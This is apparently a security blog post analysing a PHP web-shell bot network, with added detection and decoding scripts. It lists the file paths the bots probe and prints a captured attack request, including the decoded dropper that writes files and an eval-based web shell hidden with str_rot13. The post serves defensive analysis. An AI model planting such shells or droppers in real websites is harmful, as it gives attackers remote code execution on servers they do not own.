sql_dump.php – Bot network

Today we looked at the server's logs and found a very active bot network that is trying to use old malware and upload more PHP files to servers.


Malware files

If we look at the access logs, we find many files that the bots try to access but that are not normal WordPress, Joomla, etc. files.

/Abbrevsprl.php
/administrator/administrator.php
/administrator/dbconfig.php
/administrator/includes/readmy.php
/administrator/webconfig.txt.php
/al277.php
/authenticating.php
/bookmark.php
/cache/cache_aqbmkwwx.php
/cache/cachee.php
/cache/defau1t.php
/cache/list.php
/cache/news.php
/cache/support.php
/cli/40dd1d.php
/configbak.php
/configurationbak.php
/dswat.org/wsdl.php
/elements.php
/email.php
/error-log.php
/functions.php
/goog1es.php
/google-assist.php
/images/1ndex.php
/images/404.php
/images/al277.php
/images/defau1t.php
/images/google-assist.php
/images/head.php
/images/laj.php
/images/robots.txt.php
/images/stories/0day.php
/images/xxx.php
/includes.php
/includes/u2p.php
/infos.php
/install.php
/jconfig.php
/log.php
/maill.php
/media/1ndex.php
/media/404.php
/media/reads.php
/media/tmp.php
/news.php
/r3x.php
/robot.php
/robots.txt.php
/RoseLeif.php
/SessionController.php
/shootme.php
/show.php
/site/tmp/cTivrC.php
/sqlbak.php
/sql_dump.php
/thumb.php
/tmp.php
/update.php
/webconfig.txt.php
/wp-cache.php
/wp-content/plugins/Analyser.php
/wp-content/plugins/Fbrrchive.php
/wp-content/plugins/myshe.php
/wp-content/plugins/SocketIasrgasfontrol.php
/wp-content/plugins/SocketIontrol.php
/wp-content/plugins/sql_dump.php
/wp-content/plugins/wp-cache.php
/wp-content/plugins/wp-footers.php
/wp-content/plugins/wpfootes.php
/wp-content/uploads/Fbrrchive.php
/wp-data.php
/wp-main.php
/wsdl.php
/xmlsrpc.php
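Checking your own access logs for requests to these file names is the quickest way to see whether the same bot network has visited. The Python script below is an added example written for this post, not code from the original article or from Malware Expert: it parses combined-format access log lines, matches the request path against a subset of the list above (assumed; load the full list in real use), and separates mere probes (404) from a shell that actually answered a POST. The log lines are constructed samples.

```python
import re
from collections import Counter

# Constructed sample of combined-format access log lines (not taken from the article);
# the probed paths and the Googlebot user agent mirror what the article reports.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2017:08:12:01 +0000] "GET /images/stories/0day.php HTTP/1.1" 404 213 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.0.113.7 - - [10/Jan/2017:08:12:02 +0000] "GET /wp-content/plugins/sql_dump.php HTTP/1.1" 404 213 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.51.100.4 - - [10/Jan/2017:08:13:10 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2017:08:14:33 +0000] "POST /images/stories/0day.php?z3=QzYzanFzLnBocA%3d%3d&z4=L2ltYWdlcy9zdG9yaWVzLw%3d%3d HTTP/1.1" 200 9 "malware.expert" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
"""

# A subset of the file names listed above; load the full list in real use.
KNOWN_SHELL_PATHS = frozenset({
    "/images/stories/0day.php", "/wp-content/plugins/sql_dump.php", "/sql_dump.php",
    "/cache/defau1t.php", "/images/1ndex.php", "/robots.txt.php", "/wsdl.php",
})

# Apache/nginx "combined" log format
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["target"].split("?", 1)[0]   # drop the query string before matching
    return rec


def classify(rec, known=KNOWN_SHELL_PATHS):
    """Severity of one request against the known shell names, or None if it looks normal."""
    if rec["path"] not in known:
        return None
    if rec["method"] == "POST" and rec["status"] == 200:
        return "active-shell"      # the file exists and accepted a command: host is compromised
    if rec["status"] == 200:
        return "shell-present"     # the file answered a GET: it exists, investigate
    return "probe"                 # 404/403: the bot is only looking for it


def scan_access_log(text, known=KNOWN_SHELL_PATHS):
    """Return one hit per request to a known shell path, with severity and source."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        severity = classify(rec, known)
        if severity is None:
            continue
        hits.append({
            "ip": rec["ip"],
            "method": rec["method"],
            "path": rec["path"],
            "status": rec["status"],
            "severity": severity,
            # Google's crawler does not normally POST to PHP files; a Googlebot UA on a
            # POST is the bot network impersonating it (verify real crawlers by reverse DNS).
            "googlebot_ua_post": "Googlebot" in rec["ua"] and rec["method"] == "POST",
        })
    return hits


def sources(hits):
    """Count hits per source IP so the noisiest scanners can be blocked first."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
    print(sources(scan_access_log(SAMPLE_LOG)))
```

A 404 for one of these names is only a probe; a 200 on a POST means the shell exists and was used, and that host needs a full clean-up rather than a rule tweak.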

POST Payload

If the malware is found on the server, the bot tries to send a command and execute it. It sends a POST payload and, at the same time, a GET request to the PHP malware; the parameters are BASE64 encoded.

Request headers

--c866566e-B--
POST /images/stories/0day.php?z3=QzYzanFzLnBocA%3d%3d&z4=L2ltYWdlcy9zdG9yaWVzLw%3d%3d HTTP/1.1
Referer: malware.expert
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: malware.expert
Content-Length: 1349
Expect: 100-continue

Payload

The POST payload is also URL-encoded and BASE64 encoded:

--c866566e-C--
cmd=%40eval%2f**%2f(%24%7b%27_P%27.%27OST%27%7d%5bz9%5d%2f**%2f(%24%7b%27_POS%27.%27T%27%7d%5bz0%5d))%3b&z9=BaSE64_dEcOdE&z0=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%3d&z2=EFBBBF3C3F70687020282473756E203D20245F504F53545B276E6E64275D292026262040707265675F7265706C61636528272F61642F65272C2740272E7374725F726F743133282772696E7927292E27282473756E29272C202761646427293B3F3E6C736C666A73646C666B6A73646A6C665344466C666A70376A64736673646C6A666C73646B666A6C6B6A6C6B6A6C736B6A61646C6A6468676C726B652121212121402324255E2524244024235E402531323433352523242523402423256A6B6466686768676965726E716E77765F2B26252426235E252A285156524A4C515745524C515757455224252526252640252324255E25265E262A2A262829282925402421232525

Decoding

If we collect all the parameters of the GET/POST requests and decode them:

cmd=@eval/**/(${'_P'.'OST'}[z9]/**/(${'_POS'.'T'}[z0]));
z3=C63jqs.php
z4=/images/stories/
z9=BaSE64_dEcOdE

z0 parameter

@ini_set("display_errors","0");           // hide PHP errors from the response
@set_time_limit(0);                        // no execution time limit
@set_magic_quotes_runtime(0);              // keep the payload bytes unescaped
$npath=$_SERVER['DOCUMENT_ROOT'].BaSE64_dEcOdE($_GET['z4']);   // target directory from z4 (PHP function names are case-insensitive)
function createFolder($path) {             // recursive mkdir, world-writable
   if(!file_exists($path))
   {
   createFolder(dirname($path));
   mkdir($path, 0777);
   }
}
createFolder($npath);
echo(">|");;                               // response marker the bot looks for
$c=$_POST["z2"];                           // hex-encoded body of the file to write
$f=$npath.BaSE64_dEcOdE($_GET["z3"]);      // target file name from z3
$c=str_replace("\r","",$c);
$c=str_replace("\n","",$c);
$buf="";
for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));   // hex pairs -> bytes via urldecode
echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;   // write the new shell; prints 1 on success
echo("|<-");                               // closing marker (see the response at the end of z2 below)
die();

z2 parameter

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

Decoding z2 parameter

($sun = $_POST['nnd']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($sun)', 'add');
lslfjsdlfkjsdjlfSDFlfjp7jdsfsdljflsdkfjlkjlkjlskjadljdhglrke!!!!!@#$%^%$$@$#^@%12435%#$%#@$#%jkdfhghgiernqnwv_+&%$&#^%*(QVRJLQWERLQWWER$%%&%&@%#$%^%&^&**&()()%@$!#%%|<-
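The decoding steps shown above (URL-decoding the form fields, BASE64 for z0/z3/z4, the per-byte urldecode hex loop for z2 with its UTF-8 BOM, and str_rot13 hiding the word 'eval') can be scripted so that the next captured request is decoded the same way. The Python below is an added example, not code from the article or from Malware Expert: the request line, cmd, z9 and z2 values are copied from the audit record quoted above (z2 cut to a prefix), while z0, which is elided on this page, is replaced by a labelled stand-in; the indicator names are this example's own.

```python
import base64
import codecs
import re
from urllib.parse import parse_qs, quote, urlsplit

# Request line, cmd, z9 and z2 are copied from the ModSecurity audit record quoted in the
# article (z2 cut to a prefix). z0 is elided on the page, so a labelled stand-in is
# base64-encoded and URL-encoded here instead (constructed).
REQUEST_LINE = ("POST /images/stories/0day.php?z3=QzYzanFzLnBocA%3d%3d"
                "&z4=L2ltYWdlcy9zdG9yaWVzLw%3d%3d HTTP/1.1")
STANDIN_Z0 = base64.b64encode(b'echo("stand-in for the elided z0 dropper");').decode()
Z2_HEX = ("EFBBBF3C3F70687020282473756E203D20245F504F53545B276E6E64275D29202626204070"
          "7265675F7265706C61636528272F61642F65272C2740272E7374725F726F743133282772696E79"
          "27292E27282473756E29272C202761646427293B3F3E6C736C666A")
POST_BODY = ("cmd=%40eval%2f**%2f(%24%7b%27_P%27.%27OST%27%7d%5bz9%5d%2f**%2f"
             "(%24%7b%27_POS%27.%27T%27%7d%5bz0%5d))%3b&z9=BaSE64_dEcOdE"
             "&z0=" + quote(STANDIN_Z0, safe="") + "&z2=" + Z2_HEX)

# Names are this example's own; each pattern marks one trick visible in the decoded request.
INDICATORS = [
    ("eval", r"\beval\s*(?:/\*.*?\*/)?\s*\("),            # @eval/**/( with a comment as spacer
    ("preg_replace_e", r"preg_replace\s*\(\s*'[^']*/e'"),  # /e modifier runs the replacement as code
    ("rot13_obfuscation", r"str_rot13\s*\("),
    ("split_superglobal", r"\$\{'_[A-Z]*'\.'[A-Z]*'\}"),  # ${'_P'.'OST'} to dodge $_POST string matches
    ("file_write", r"fwrite\s*\(\s*fopen"),
    ("world_writable_mkdir", r"mkdir\s*\([^)]*0777"),
]


def find_indicators(php_text):
    """Return the names of every indicator pattern present in a piece of PHP."""
    return [name for name, pat in INDICATORS if re.search(pat, php_text)]


def hex_to_php(hex_text):
    """Undo the dropper's per-byte urldecode('%XX') loop and strip the UTF-8 BOM."""
    raw = bytes.fromhex(hex_text.replace("\r", "").replace("\n", ""))
    if raw.startswith(b"\xef\xbb\xbf"):
        raw = raw[3:]
    return raw.decode("utf-8", "replace")


def decode_request(request_line, post_body):
    """Decode every layer of one dropper request the way the PHP on the server would."""
    target = request_line.split(" ")[1]
    params = {k: v[0] for k, v in parse_qs(urlsplit(target).query).items()}
    params.update({k: v[0] for k, v in parse_qs(post_body).items()})   # POST wins on clashes

    result = {"cmd": params.get("cmd", "")}
    # cmd evaluates $_POST[z9]($_POST[z0]); z9 names the decoder, here BaSE64_dEcOdE
    # (PHP function names are case-insensitive)
    if params.get("z9", "").lower() == "base64_decode" and "z0" in params:
        result["z0"] = base64.b64decode(params["z0"]).decode("utf-8", "replace")
    # the z0 stage base64-decodes z3 (file name) and z4 (directory) from the query string
    for key in ("z3", "z4"):
        if key in params:
            result[key] = base64.b64decode(params[key]).decode("utf-8", "replace")
    if "z3" in result and "z4" in result:
        result["drop_path"] = result["z4"] + result["z3"]    # relative to DOCUMENT_ROOT
    if "z2" in params:
        result["z2_php"] = hex_to_php(params["z2"])
        # str_rot13('riny') is how the written file hides the function it really calls
        result["rot13_reveals"] = [codecs.decode(s, "rot13")
                                   for s in re.findall(r"str_rot13\('([^']*)'\)", result["z2_php"])]
    stages = "\n".join(result.get(k, "") for k in ("cmd", "z0", "z2_php"))
    result["indicators"] = find_indicators(stages)
    return result


if __name__ == "__main__":
    for key, value in decode_request(REQUEST_LINE, POST_BODY).items():
        print(f"{key}: {value}")
```

With the real z0 from a capture, the indicator list also picks up the fwrite/fopen and mkdir 0777 patterns of the dropper; the drop_path value tells you which file to look for on disk.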

Writing more malware

Now we see this malware trying to write the C63jqs.php malware into the server folder /images/stories/, which is a Joomla directory.

Final words

Websites using the Malware Expert – ModSecurity rules are protected against this bot network's attacks.

Use Malware Expert – Signatures to detect this malware in your files for FREE!